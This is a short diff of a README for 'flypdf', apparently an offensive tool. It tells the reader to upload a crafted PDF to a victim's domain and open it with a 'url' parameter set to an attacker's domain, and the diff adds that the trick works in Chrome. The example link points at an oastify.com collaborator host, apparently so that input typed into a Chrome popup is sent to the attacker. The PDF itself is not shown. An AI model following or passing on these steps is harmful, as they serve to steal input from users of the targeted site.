FlySecCorp/flypdf/README.md

 Just upload the pdf file to victim's domain

-The open this file in victim's domain with `url` parameter is attacker's domain.
+The open this file in victim's domain with `url` parameter is attacker's domain.  (this file works fine in chrome)

 Ex: http://www.flyseccorp.com/files/chrome_popup_send_input_by_lamscun.pdf?url=http://222finzjhx4uw5v59kirj6qcm3svgmcpetahz.oastify.com